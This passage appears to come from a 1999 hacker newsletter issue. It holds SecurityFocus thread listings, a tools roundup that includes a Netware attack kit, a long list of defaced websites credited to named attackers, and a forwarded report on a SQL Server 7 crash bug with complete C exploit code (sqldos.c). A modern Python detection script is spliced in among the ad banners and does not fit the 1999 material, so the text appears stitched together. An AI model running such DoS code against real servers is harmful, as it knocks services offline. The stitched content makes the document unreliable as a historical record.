8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl

9. BIND Scanning (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU

10. sweep (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com

11. pop3/imap crawler.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org

12. UK Law & Cases Re Malicious action/attacks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk

13. cgi attack
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr

14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br

15. Port 98 scans & new 3128/8080 scans
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com

V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27
----------------------------------------------------------

1. Re: icq accounts (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu

2. Re: WordPad/riched20.dll buffer overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com

3. SSH exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com

4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se

5. Re: development of wordpad exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net

VI. SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------------

1. SecurityFocus.com is looking for staff writers for a Windows NT column!
Reply to: Alfred Huger
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com

2. NYC - Internet Security Position
Reply to: timoe@interworld.com
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com

3. Security Research Engineer
Reply to: Samuel Cure
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com

VII. SECURITY SURVEY 1999-11-15 to 1999-11-27
----------------------------------------------

The question for 1999-11-15 to 1999-11-27 was:

Which Security conference do you think is more useful to attendees? (Bang for your buck)

SANS                            31% / 30 votes
BlackHat                        15% / 15 votes
TISC                             4% /  4 votes
CSI                              5% /  5 votes
Chaos Communications Congress    6% /  6 votes
Defcon                          30% / 29 votes

Total number of votes: 94 votes

VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27
--------------------------------------------------------

1. SecurityFocus.com Pager by SecurityFocus.com
URL: http://www.securityfocus.com/pager/sf_pgr20.zip
Platforms: Win95/98/NT
Number of downloads: 1690

This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable).

2. Lookout by Dragonmount Networks
URL: http://www.dragonmount.net/software/lookout/
Platforms: Windows 2000, Windows 95/98 and Windows NT
Number of downloads: 1222

Lookout provides raw access to data sent over a TCP connection, allowing the inspection of protocols and the testing of buffers. Lookout connects to a foreign host's port and allows you to communicate with the host. Alternatively, Lookout can listen on a port and wait for another host to connect. Lookout can send variable-length strings to test buffers easily.

3. cgicheck99 0.4 by deepquest
URL: http://www.deepquest.pf/
Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000, Windows 3.x, Windows 95/98, Windows CE and Windows NT
Number of downloads: 1079

This is one of the world's most cross-platform cgi scanners, running on 37 operating systems! Even PalmOS soon! It will check for 119 common cgi and other remote issues, and it will report the Bugtraq ID of some vulnerabilities. Get the rebol interpreter at http://www.rebol.com.

4. HookProtect by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua
URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html
Platforms: Windows 95/98 and Windows NT
Number of downloads: 777

HookProtect version 2.05 is another powerful product of the PCinvestigator series. It specializes in detecting programs that infringe privacy and confidentiality on personal computers. There are many types of such programs: keyloggers, interceptors, spies, Trojans and so on. Their main function is monitoring some kind of user activity on a computer (for example, typing text, running applications, opening windows, Internet activity, etc.).

5.
Pandora for Linux v4 beta 2 by Nomad Mobile Research Centre URL: http://www.nmrc.org/pandora Platforms: Linux Number of downloads: 693 BETA - Online point and click auditing of Novell Netware from Windows NT. Currently spoofing works but lots of crashes on SP3 (we're working on it). Attach to server with password hashes extracted from Offline program. Search for target servers. Attach to a server and grab user accounts without logging in. Dictionary attack against user account. Multiple Denial of Service attacks. Improved spoofing and hijacking by using realtime sniffing. Works against Netware 4 and 5. 6. Sun Enterprise Network Security Service Early Access 1 by Sun Microsystems URL: http://www.sun.com/software/communitysource/senss/ Platforms: Java Number of downloads: 637 Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based security solution: a tool that enables organizations to audit and secure their systems and networks in a modern, heterogeneous, corporate intranet. The SENSS software is not yet complete; this is the Early Access 1 release, made available for the benefit of parties with a professional interest in network security, for their experimentation and comment. The source code is licensed under the Sun Community Source-Code License, consistent with the Sun Community Source License principles. IX. SPONSOR INFORMATION - ------------------------------------------ URL: http://www.core-sdi.com CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. CORE SDI also has extensive experiance dealing with financial and government contracts through out Latin and North America. X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? 
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBSCRIBE SF-NEWS Lastname, Firstname

You will receive a confirmation request message to which you will have to
answer.

2. How do I unsubscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
address with a message body of:

UNSUBSCRIBE SF-NEWS

If your email address has changed email aleph1@securityfocus.com and I will
manually remove you.

3. How do I disable mail delivery temporarily?

If you are simply going on vacation you can turn off mail delivery without
unsubscribing by sending LISTSERV the command:

SET SF-NEWS NOMAIL

To turn e-mail delivery back on use the command:

SET SF-NEWS MAIL

4. Is the list available in a digest format?

Yes. The digest is generated once a day.

5. How do I subscribe to the digest?

To subscribe to the digest join the list normally (see section 0.2.1) and
then send a message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SET SF-NEWS DIGEST

6. How do I unsubscribe from the digest?

To turn the digest off send a message to LISTSERV with a message body of:

SET SF-NEWS NODIGEST

If you want to unsubscribe from the list completely follow the instructions
of section 0.2.2 next.

7. I seem to not be able to unsubscribe. What is going on?

You are probably subscribed from a different address than that from which
you are sending commands to LISTSERV. Either send email from the
appropriate address or email the moderator to be unsubscribed manually.

Alfred Huger
VP of Engineering
SecurityFocus.com

@HWA

28.0 SQL 7 "Magic Packet" DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From NTSecurity list

Kevork Belian discovered this on Dec. 1. I have been working with his code
trying to replicate the results but have yet to be successful. This does not
mean that Kevork's findings are incorrect, it just means that I need to do
more testing. I don't believe in holding information back from the mailing
list so here are the complete details as received from Kevork, including his
code.

This was tested on SQL 7.00.699. The MS SQL Server TCP/IP net library must be
enabled. Sending more than 3 NULL bytes in the TCP data can crash the SQL
Server. MS SQL listens on TCP port 1433. If this attack is successful you
will see an event 17055 in your log and you will have to reboot to restore
service.

It has been suggested that a solution would be to block incoming traffic on
port 1433 or disable the TCP/IP net library. Of course this could have an
impact on the functionality of the product. It would be preferable to have
an MS hotfix for this issue. Microsoft has been notified and is working on
the situation themselves. It is unknown at this time if this attack is
actually being carried out.

============ original text from Kevork Belian ========

Description:

MS SQL Server 7.0 silently crashes when sent a TCP packet containing more
than 2 NULLs as data. I tested this on machines running SQL Server version
7.00.699 (SP 1). The NT box is running NT Server with SP 4 (I don't think
the Service Pack is an issue since NT is not affected).

If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL
Server listening on port 1433. The SQL server raises an event 17055 with
fatal exception EXCEPTION_ACCESS_VIOLATION.

I have noticed that you might experience a situation when the SQL Server
won't crash at first; keep resending the packet until it crashes
(hopefully). It puzzles me why other people weren't able to reproduce it.
Is it a misconfiguration issue? (I seriously doubt it.)

thanks
Kevork Belian

========end text=========

====begin script from Kevork Belian=====

/*
** sqldos.c -- a DoS attack against MS SQL Server
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 1433 /* the port SQL Server listens on */

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    struct hostent *he;
    char buff[65535];
    struct sockaddr_in target_addr;

    if (argc != 2) {
        fprintf(stderr, "Usage: sqldos target\n");
        exit(1);
    }

    /* resolve the target; herror() reports h_errno, which perror() would not */
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket error");
        exit(1);
    }

    target_addr.sin_family = AF_INET;
    target_addr.sin_port = htons(PORT);
    target_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(target_addr.sin_zero), 8);

    if (connect(sockfd, (struct sockaddr *)&target_addr,
                sizeof(struct sockaddr)) == -1) {
        perror("connect error");
        exit(1);
    }

    /* zero the whole buffer so every one of the 14 bytes sent is a NUL,
       which is well past the 3-NUL trigger described above */
    memset(buff, 0, sizeof(buff));
    if ((numbytes = send(sockfd, buff, 14, 0)) == -1) {
        perror("send error");
        exit(1);
    }
    printf("sent %d bytes to %s:%d\n", numbytes, argv[1], PORT);

    close(sockfd);
    return 0;
}

=======end script=========

Of course credit has to go to Kevork Belian as he made the discovery. I
would be interested to hear if anyone else can replicate this.

Regards;

Steve Manzuik
Moderator
Win2K Security Advice

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

-=----------=- -=----------=- -=----------=- -=----------=-
      0      0      0      o      O      O      O      0
-=----------=- -=----------=- -=----------=- -=----------=-
-=----------=- -=----------=- -=----------=- -=----------=-

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
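The SQL Server 7 NUL-byte crash reported in the post above can be triaged from a packet capture rather than by waiting for event 17055. The Python below is an added example by the editor, not code from the NTSecurity post, from Kevork Belian or from Microsoft: it parses raw IPv4/TCP frames and flags any segment addressed to TCP 1433 whose data carries three or more NUL bytes, the trigger the post describes. The sample frames are constructed inline (IP and TCP checksums left at zero, since nothing here validates them) and are not captured traffic; the threshold constant, the framing helper and the host addresses are the editor's assumptions. One caveat the post does not raise: ordinary TDS client traffic also contains NUL bytes (UCS-2 strings in the login packet, for instance), so a bare NUL count is a triage signal to correlate with event 17055 on the server, not something to block on; the last sample frame shows exactly that kind of false positive.

```python
"""Flag TCP segments to port 1433 carrying >= 3 NUL bytes (sqldos-style probes)."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

SQL_PORT = 1433        # MS SQL Server TCP/IP net library port named in the post
NUL_THRESHOLD = 3      # the post reports a crash at 3 or more NUL bytes of TCP data


@dataclass
class TcpSegment:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes


def parse_ipv4_tcp(frame: bytes) -> Optional[TcpSegment]:
    """Parse a raw IPv4 packet carrying TCP; return None for anything else."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[2:4])[0]
    if frame[9] != 6 or ihl < 20 or total_len > len(frame) or total_len < ihl + 20:
        return None                      # not TCP, or header lengths do not add up
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    tcp = frame[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4        # TCP header length in bytes
    if data_off < 20 or data_off > len(tcp):
        return None
    return TcpSegment(src, dst, sport, dport, tcp[data_off:])


def is_sql_nul_probe(seg: TcpSegment) -> bool:
    """True when the segment goes to 1433 and its data holds NUL_THRESHOLD+ NULs."""
    return (seg.dport == SQL_PORT
            and len(seg.payload) > 0
            and seg.payload.count(0) >= NUL_THRESHOLD)


def scan(frames: List[bytes]) -> List[Tuple[str, int, int, int]]:
    """Return (src, sport, nul_count, payload_len) for every flagged frame."""
    hits = []
    for frame in frames:
        seg = parse_ipv4_tcp(frame)
        if seg is not None and is_sql_nul_probe(seg):
            hits.append((seg.src, seg.sport, seg.payload.count(0), len(seg.payload)))
    return hits


# --- constructed sample traffic (editor's test data, not a real capture) ---
def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal IPv4+TCP framing; checksums stay zero because nothing checks them here."""
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp_hdr) + len(payload),
                         0, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    return ip_hdr + tcp_hdr + payload


SAMPLE_FRAMES = [
    # what sqldos.c sends: 14 data bytes, all NUL -> flagged
    build_ipv4_tcp("10.0.0.5", "10.0.0.1", 40000, SQL_PORT, b"\x00" * 14),
    # plain text to 1433, no NULs -> not flagged
    build_ipv4_tcp("10.0.0.6", "10.0.0.1", 40001, SQL_PORT, b"SELECT 1"),
    # NULs, but to a web server port -> not flagged
    build_ipv4_tcp("10.0.0.7", "10.0.0.2", 40002, 80, b"\x00" * 5),
    # only two NULs, below the reported trigger -> not flagged
    build_ipv4_tcp("10.0.0.8", "10.0.0.1", 40003, SQL_PORT, b"\x00\x00AB"),
    # TDS-style header plus a UCS-2 string: legitimate-looking, yet flagged (the caveat)
    build_ipv4_tcp("10.0.0.9", "10.0.0.1", 40004, SQL_PORT,
                   b"\x10\x01\x00\x20\x00\x00\x01\x00" + "sa".encode("utf-16-le")),
]

if __name__ == "__main__":
    for src, sport, nuls, size in scan(SAMPLE_FRAMES):
        print(f"{src}:{sport} -> tcp/{SQL_PORT}: {nuls} NUL of {size} data bytes")
```

Feed it frames from a raw socket or a pcap reader and the two flagged sources above are the ones to check against the server's application log; the 10.0.0.9 hit is there to show why the count alone does not prove an attack.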
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE

*****************************************************************************
*                                                                           *
*  ATTRITION.ORG http://www.attrition.org                                   *
*  ATTRITION.ORG Advisory Archive, Hacked Page Mirror                       *
*  ATTRITION.ORG DoS Database, Crypto Archive                               *
*  ATTRITION.ORG Sarcasm, Rudeness, and More.                               *
*                                                                           *
*****************************************************************************

When people ask you "Who is Kevin Mitnick?" do you have an answer?

    ########################################
    # Support 2600.com and the Free Kevin  #
    # defense fund site, visit it now!     #
    #             FREE KEVIN!              #
    ########################################

    http://www.2600.com/
    http://www.freekevin.com/
    http://www.kevinmitnick.com/

+-----------------------------------------------------------------------------+
| SmoG Alert ..         http://smog.cjb.net/          NEWS on SCIENCE         |
| ===================   http://smog.cjb.net/          NEWS on SECURITY        |
| NEWS/NEWS/NEWS/NEWS   http://smog.cjb.net/          NEWS on THE NET         |
|                       http://smog.cjb.net/          NEWS on TECHNOLOGY      |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* http://www.csoft.net  One of our sponsors, visit them now     www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed           //
// or cruciphux@dok.org                                                     //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...

SITE.1 You can send in submissions for this section too if you've found (or
RUN) a cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups
like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name; others aren't so obvious but do exist.

>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

* Info supplied by the attrition.org mailing list.

Listed oldest to most recent...
Defaced domain: sony.com.pa
Site Title: Sony (Panama)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.dellnet.com.br
Site Title: DellNet
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br
Defaced by: The Death Knights
Operating System: Linux

Defaced domain: www.gateway.com.my
Site Title: Gateway Malaysia
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my
Defaced by: ieet
Operating System: Windows NT

Defaced domain: www.honda.com.kw
Site Title: Honda Korea
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw
Defaced by: ytcracker
Operating System: Linux

Defaced domain: www.pcmac.com
Site Title: PC Mac Consultants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com
Defaced by: cipher
Operating System: Windows NT

Defaced domain: homesandloansinc.com
Site Title: Homes And Loans Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com
Defaced by: Tranzer
Operating System: Windows NT

Defaced domain: www.boobshack.com
Site Title: Boob Shack
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com
Defaced by: naptime
Operating System: Linux

Previously Hacked
Defaced domain: www.whitehousehistory.org
Site Title: The White House Historical Association
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org
Defaced by: Einstein
Operating System: Windows NT
Attrition comment: 2nd time hacked

Defaced domain: www.faculdadesantamarta.br
Site Title: Faculdade Santa Marta
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br
Defaced by: The Death Knights
Operating System: Linux

Previously Hacked
Defaced domain: sony.com.pa
Site Title: Sony Panama
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Defaced by: Antichrist
Operating System: Windows NT
Attrition comment: 2nd time defaced

Defaced domain: www.ai-security.com
Site Title: AI Security Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com
Defaced by: g e n X h a k
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)

Previously Hacked
Defaced domain: www.monicalewinsky.com
Site Title: Monica Lewinsky's Web site
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com
Defaced by: un1x bowling t34m
Operating System: BSDI
Attrition comment: 4th time defaced

Defaced domain: www.nissan.com.mx
Site Title: Nissan Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx
Defaced by: ytcracker
Operating System: Windows NT

Previously Hacked
Defaced domain: acquisition.jpl.nasa.gov
Site Title: Jet Propulsion Labs NASA
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.10.26 by phreak.nl

Defaced domain: www.whataburger.com
Site Title: Whataburger Restaurants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com
Defaced by: klept0
Operating System: Linux

Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe
Defaced by: xhostile/acidklown
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.spyconnection.com
Site Title: Spy Connection
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com
Defaced by: `defcon
Operating System: BSDI

Defaced domain: www.wireless.ee
Site Title: Phreak.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee
Defaced by: Phreak.nl
Operating System: Windows 95

Defaced domain: www.oab.org.br
Site Title: Ordem dos Advogados do Brasil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br
Defaced by: inferno.br
Operating System: Windows NT

Defaced domain: www.fabrisia.com
Site Title: Fabrisia Cronin
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com
Defaced by: Analognet
Operating System: Linux

Defaced domain: www.rayee.com
Site Title: Rayee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com
Defaced by: Analognet
Operating System: BSDI

Defaced domain: www.streamingcam.com
Site Title: Streaming Cam
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com
Defaced by: Analognet
Operating System: BSDI

Defaced domain: www.compunetcgi.com
Site Title: Compunet Computer Group
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com
Defaced by: Evil Entity
Operating System: Windows NT (IIS/4.0)

Defaced domain: whv1.warnervideo.com
Site Title: Warner Home Video
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com
Defaced by: etC
Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a)

Defaced domain: www.dds.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be
Defaced by: sacudo69
Operating System: Irix (Rapidsite/Apa-1.3.4)

Previously Hacked
Defaced domain: www.hg.com.cn
Site Title: HG China
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn
Defaced by: kryptek
Operating System: Solaris
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.

Previously Hacked
Defaced domain: www.nukleer.gov.tr
Site Title: Cekmece Nuclear Research and Training Center
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr
Defaced by: oystr-n-klam
Operating System: Linux
Attrition comment: 2nd time defaced

Defaced domain: www.latino-market.com
Site Title: Millennium Computers
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com
Defaced by: p4riah
Operating System: Windows NT

Defaced domain: bodystore.nu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu
Defaced by: I.R.C.
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.investigationresources.com
Site Title: Investigative Resources Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Attrition comment: mass hack

Previously Hacked
Defaced domain: www.esdcinc.com
Site Title: ESDC Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com
Defaced by: Floghe
Operating System: Windows NT

Defaced domain: www.thomashosp.com
Site Title: Thomas Hosp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com
Defaced by: w0lf
Operating System: Irix

Defaced domain: www.lottoteam.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de
Defaced by: r00tabega
Operating System: Irix (Rapidsite/Apa-1.3.4)

Defaced domain: www.familyheartbeat.org
Site Title: electr0n
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org
Defaced by: electr0n
Operating System: BSDI

Defaced domain: www.phifersystems.com
Site Title: Phifer Systems, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com
Defaced by: ytcracker
Operating System: Linux

Defaced domain: www.barat.edu
Site Title: Barat College
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu
Defaced by: phiber
Operating System: Windows NT

Defaced domain: west.medicdata.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com
Defaced by: ytcracker
Operating System: Red Hat Linux (Apache 1.3.6)

Defaced domain: www.car-4sale.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com
Defaced by: ytcracker
Operating System: BSDI 3.0 (Apache 1.2.6)

Defaced domain: tfcnews.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com
Defaced by: Hate Inc
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.ahcg.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com
Defaced by: xhostile & acidklown
Operating System: MacOS (AppleShareIP/6.0.0)

Defaced domain: www.globefilm.com.au
Site Title: Globe Film
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au
Defaced by: xhostile & acidk|own
Operating System: Windows NT

Defaced domain: www.calcapital.com
Site Title: Cal Capital
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com
Defaced by: hV2k
Operating System: BSDI

Defaced domain: stace.commed.ru
Site Title: Commed Web Hosting
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru
Defaced by: ytcracker
Operating System: Linux

Defaced domain: www.toystory2.net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net
Defaced by: zeroc
Operating System: BSDI (Apache 1.3.6)

Defaced domain: www.uni-net.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk
Defaced by: RETURN OF APOCALYPSE
Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4)
HIDDEN comments in the HTML.

Previously Hacked
Defaced domain: www.lottoteam.de
Site Title: Lotto Team
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de
Defaced by: Fuby
Operating System: Irix
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.

Defaced domain: www.m-hip.com
Site Title: McDermit Combined Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.pornography.com
Site Title: Atlantis Management Group
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com
Defaced by: Sploit
Operating System: Windows NT (IIS/4.0)

Previously Hacked
Defaced domain: tfcnews.com
Site Title: TFC News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Attrition comment: Yes, it really was hacked.

Defaced domain: unix.webgraphics.com
Site Title: Worldwide Web Graphics
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com
Defaced by: Nitr0BurN
Operating System: Linux (Apache 1.3.4)

Defaced domain: www.ivcsnet.net
Site Title: Imperial Valley Computer Service
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)

Defaced domain: mars.assiniboinec.mb.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca
Defaced by: nitroburn
Operating System: Linux (Apache 1.2.6)

Defaced domain: radius.preferred.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com
